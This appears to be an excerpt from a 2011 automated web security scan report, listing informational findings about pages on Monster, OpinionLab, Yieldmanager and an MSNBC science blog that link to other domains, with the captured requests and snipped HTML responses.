<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574233&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fbusinessonmain.msn.com%2Fvideos%2Fcoolrunnings.aspx%3Fcp-documentid%3D26925865%26source%3Dmsneditorial%26gt1%3D25049&lc=1033&id=264792" class="dMSNME_1">Sign In</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Web</a>
...[SNIP]...
<li class="last"><a href="http://www.sprint.com/business" title="Brought to You By Sprint" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/C2/F78B5FD8886A5028961034FD49E2.png" width="234" height="44" alt="Brought to You By Sprint" />
...[SNIP]...
<li class="first"><a href="http://www.facebook.com/pages/Business-on-Main/162288430462194" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/75/879DDAEC9FAEC927456F7EF14C866C.png" width="25" height="25" alt="Facebook" />
...[SNIP]...
<li><a href="http://twitter.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/70/661149A5243780BB5C34B30989D84.png" width="25" height="26" alt="Twitter" />
...[SNIP]...
<li><a href="http://youtube.com/businessonmain" onclick="return Msn.Navigation.OpenNew(event, this)"><img src="http://blstb.msn.com/i/D2/E140B3BB99D7595CE751D4A1D3C.png" width="25" height="25" alt="YouTube" />
...[SNIP]...
<li id="community" class="menuitem"><a href="http://businessonmain.liveworld.com" _menuid="community">COMMUNITY</a>
...[SNIP]...
<li id="profile" class="menuitem first"><a href="http://businessonmain.liveworld.com/BoM-profile.jspa" _menuid="profile">PROFILE</a></li><li id="groups" class="menuitem"><a href="http://businessonmain.liveworld.com/groups/Groups/800000000" _menuid="groups">GROUPS</a></li><li id="contacts" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-contacts.jspa" _menuid="contacts">CONTACTS</a></li><li id="messages" class="menuitem"><a href="http://businessonmain.liveworld.com/BoM-messages.jspa" _menuid="messages">MESSAGES</a></li><li id="memberdirectory" class="menuitem"><a href="http://businessonmain.liveworld.com/businessdirectory.jspa" _menuid="memberdirectory">MEMBER DIRECTORY</a>
...[SNIP]...
<li id="accountsettings" class="menuitem last"><a href="http://businessonmain.liveworld.com/BoM-usersettings.jspa" _menuid="accountsettings">ACCOUNT SETTINGS</a>
...[SNIP]...
<div><iframe id="fblikeframe" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:450px; height:80px;" src="http://www.facebook.com/plugins/like.php?href=http://businessonmain.msn.com/videos/coolrunnings.aspx?cp-documentid=26925865&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=80"></iframe>
...[SNIP]...
<div id=""videoplayerswf""><a href="http://www.adobe.com/downloads/" rel="Rel" title="Title"><img src="http://blstb.msn.com/i/89/99893E6D96DBC4F2C69D55C599610.png" width="761" height="316" alt="Get Adobe Flash Player (Get Flash)" />
...[SNIP]...
<li class="first"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Terms of Use</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://help.live.com/help.aspx?project=tou&mkt=en-us#faq0">Code of Conduct</a>
...[SNIP]...
<li class="last"><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx">Trademark</a>
...[SNIP]...
</script><script type="text/javascript" src="https://amch.questionmarket.com/adsc/d746470/3/746471/randm.js"></script>
...[SNIP]...

17.71. http://can.monster.com/cookie-technology.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://can.monster.com
Path:	/cookie-technology.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://can.monster.com/cookie-technology.aspx?WT.mc_n=JDN00000CT

The response contains the following links to other domains:

http://about-monster.com/?WT.mc_n=canmktg
http://delicious.com/post?v=5&noui&jump=close&url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network
http://digg.com/submit?url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&bodytext=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&topic=education&media=news
http://finance.aol.com/quotes/monster-worldwide-inc/mww/nys
http://phx.corporate-ir.net/phoenix.zhtml?c=110723&p=irol-IRHome
http://reddit.com/submit?url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network
http://technorati.com/faves/?add=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network
http://twitter.com/home?status=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT
http://www.facebook.com/share.php?u=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&t=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network
http://www.monstercable.com/
http://www.monsterhires.com/?WT.mc_n=canmktg
http://www.myspace.com/index.cfm?fuseaction=postto&t=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&c=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&u=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT
http://www.stumbleupon.com/submit?url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network

Request

GET /cookie-technology.aspx?WT.mc_n=JDN00000CT HTTP/1.1
Host: can.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:30:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=atbqtujmjhqaby550qg2oe45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205223.gif" />
<a target="_blank" title="Digg" href="http://digg.com/submit?url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&bodytext=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&topic=education&media=news">Digg</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205224.gif" />
<a target="_blank" title="Del.icio.us" href="http://delicious.com/post?v=5&noui&jump=close&url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network">Del.icio.us</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205225.gif" />
<a target="_blank" title="Facebook" href="http://www.facebook.com/share.php?u=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&t=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network">Facebook</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205226.gif" />
<a target="_blank" title="Myspace" href="http://www.myspace.com/index.cfm?fuseaction=postto&t=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&c=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network&u=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT">Myspace</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205227.gif" />
<a target="_blank" title="reddit" href="http://reddit.com/submit?url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network">reddit</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205228.gif" />
<a target="_blank" title="StumbleUpon" href="http://www.stumbleupon.com/submit?url=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network">StumbleUpon</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205229.gif" />
<a target="_blank" title="Technorati" href="http://technorati.com/faves/?add=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT&title=Interest+Based+Advertising+%7c+Monster+Career+Ad+Network">Technorati</a>
...[SNIP]...
<img class="sbImage" src="http://media.monster.com/id/content20/CORE/share/205230.gif" />
<a target="_blank" title="Twitter" href="http://twitter.com/home?status=http%3a%2f%2fcan.monster.com%2fcookie-technology.aspx%3fWT.mc_n%3dJDN00000CT">Twitter</a>
...[SNIP]...
</b>
<a href="http://about-monster.com?WT.mc_n=canmktg">About Monster</a>|
<a href="http://www.monsterhires.com/?WT.mc_n=canmktg">Work for Monster</a>
...[SNIP]...
</a>|
<a href="http://phx.corporate-ir.net/phoenix.zhtml?c=110723&p=irol-IRHome">Investor Relations</a>
...[SNIP]...
<br />
..2009 Monster - All Rights Reserved - U.S. Patent No. 5,832,497 - NYSE:
<a class="orange" target="_parent" title="MWW" href="http://finance.aol.com/quotes/monster-worldwide-inc/mww/nys">MWW</a>
- Looking for <a href="http://www.monstercable.com">Monster Cable</a>
...[SNIP]...

17.72. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The page was loaded from a URL containing a query string:

http://ccc01.opinionlab.com/o.asp?id=swHtlTXj

The response contains the following link to another domain:

http://go.microsoft.com/fwlink/?LinkID=74170

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14859
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSBQDBAR=PDCAJPIDHLEEIBHNFNJFICBN; path=/
Date: Tue, 01 Feb 2011 15:30:58 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<title>Comment Card</title><script language="javascript" type="tex
...[SNIP]...
<td width="50%" valign="top" class="text"><a target="OpinionLab" href="http://go.microsoft.com/fwlink/?LinkID=74170" title="">MSN Privacy Policy</a>
...[SNIP]...

17.73. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The page was loaded from a URL containing a query string:

http://cms.ad.yieldmanager.net/v1/cms?esig=1~6451b4a684f76cdc256978b3b9011cd5f8ab2361&nwid=10000358902&sigv=1

The response contains the following link to another domain:

http://admonkey.dapper.net/RMXCookieMonster?xid=BLdOXcUmXhXH.SCUot6GMxox

Request

Response

17.74. http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.msn.com
Path:	/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz

Issue detail

The page was loaded from a URL containing a query string:

http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz?GT1=43001

The response contains the following links to other domains:

http://aaronvabch.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alanstatic.newsvine.com/
http://aneeta15.newsvine.com/
http://bestnewsiveheardinawhile.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.howstuffworks.com/2011/01/31/the-jerusalem-ufo-at-dome-of-the-rock-on-january-28-2011/
http://blogs.nature.com/news/thegreatbeyond/
http://bluevegas.newsvine.com/
http://bobbythemexicanamerican.newsvine.com/
http://boyle.newsvine.com/
http://cartersecurity.newsvine.com/
http://clydehicksjr.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://corebela.newsvine.com/
http://curbview.newsvine.com/
http://curmudgeons.blogspot.com/
http://d2847352.newsvine.com/
http://dateline.msnbc.com/
http://daveyo.newsvine.com/
http://davidam1262.newsvine.com/
http://dinali.newsvine.com/
http://earthsky.org/
http://elois2.newsvine.com/
http://eurekalert.org/
http://fishkiller3005048.newsvine.com/
http://fls13.newsvine.com/
http://freedom4everyone.newsvine.com/
http://garrettb1.newsvine.com/
http://garytesta.newsvine.com/
http://halowain.newsvine.com/
http://hanke.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://incredulousaussie.newsvine.com/
http://ipan2.newsvine.com/
http://jimseida.newsvine.com/
http://john-roach.newsvine.com/
http://karololszynski.newsvine.com/
http://kate2334454.newsvine.com/
http://kclaass.newsvine.com/
http://keithmears.newsvine.com/
http://kennethsmartasthecome.newsvine.com/
http://killsomeonewithbutter.newsvine.com/
http://kristenwinslet.newsvine.com/
http://kwilliams420.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247
http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5962284&rand=1980314499&do=msnbc.msn.com&ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::
http://louisj.newsvine.com/
http://lvtucker.newsvine.com/
http://malem2us.newsvine.com/
http://mikes12.newsvine.com/
http://mikeymike.newsvine.com/
http://mollie1m.newsvine.com/
http://mossdog420m.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://pauldoughton.newsvine.com/
http://pin3hot.newsvine.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.msn.com/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://rich-1210649.newsvine.com/
http://rockymtneve.newsvine.com/
http://sancho79.newsvine.com/
http://scaughtpar.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://smitch3006997.newsvine.com/
http://smlong.newsvine.com/
http://sonya3007109.newsvine.com/
http://spacefellowship.com/
http://sssixxx.newsvine.com/
http://stone3007194.newsvine.com/
http://styro.newsvine.com/
http://tha-pyngwyn.newsvine.com/
http://thebradley.newsvine.com/
http://theslowplaya.newsvine.com/
http://today.msnbc.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://ufopartisan.blogspot.com/
http://vengeance187.newsvine.com/
http://viaggiatore.newsvine.com/
http://vlado2.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/CosmicLog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/78613a6000f68a6f349cba6b720c09dbb35c5147.css?v=23247
http://www.polls.newsvine.com/_static/js/4713977068982ab8195d08eef7655a7e99b08ed4.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.unmannedspaceflight.com/
http://www.youtube.com/watch?feature=player_embedded&v=rY2FFEufsuY
http://www.youtube.com/watch?v=SrmPTnhaHzs
http://yourekidding-1544479.newsvine.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com

Request

GET /_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz?GT1=43001 HTTP/1.1
Host: cosmiclog.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=240
Date: Tue, 01 Feb 2011 15:31:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 165751

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Jerusalem vi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://cosmiclog.msnbc.msn.com/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/78613a6000f68a6f349cba6b720c09dbb35c5147.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/4713977068982ab8195d08eef7655a7e99b08ed4.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5962284&rand=1980314499&do=msnbc.msn.com&ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a>, or connect via <a href="http://www.facebook.com/cosmiclog" target="_blank">Facebook</a> or <a href="http://twitter.com/b0yle" target="_blank">Twitter</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://cosmiclog.msnbc.msn.com/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/CosmicLog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
to descend toward the skyline, around the location of the Dome of the Rock (also known as the Temple Mount). A minute into the clip, there's a bright flash, then the speck shoots up from the skyline. <a target="_blank" href="http://www.youtube.com/watch?v=SrmPTnhaHzs">This version of the Jan. 28 clip</a>
...[SNIP]...
<p><a target="_blank" href="http://www.youtube.com/watch?feature=player_embedded&v=rY2FFEufsuY">Here's another version</a>
...[SNIP]...
views come from perspectives that could make nearby objects seem farther away and faster-moving. Or they might wonder whether the whole thing was faked. Over at HowStuffWorks, Marshall Brain offers a <a target="_blank" href="http://blogs.howstuffworks.com/2011/01/31/the-jerusalem-ufo-at-dome-of-the-rock-on-january-28-2011/">smorgasbord of videos</a>
...[SNIP]...
</a> community by clicking the "like" button on <a target="_blank" href="http://www.facebook.com/cosmiclog"><span style="text-decoration: underline;">
...[SNIP]...
</a> or by following msnbc.com science editor Alan Boyle as <a href="http://twitter.com/b0yle"><span style="text-decoration: underline;">
...[SNIP]...
</a>. To learn more about Alan Boyle's book about Pluto and the search for planets, check out the <a target="_blank" href="http://www.thecaseforpluto.com/"><span style="text-decoration: underline;">
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="cosmiclog" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz" data-Text="Jerusalem videos stir UFO buzz">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://alanstatic.newsvine.com/">alan_static</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
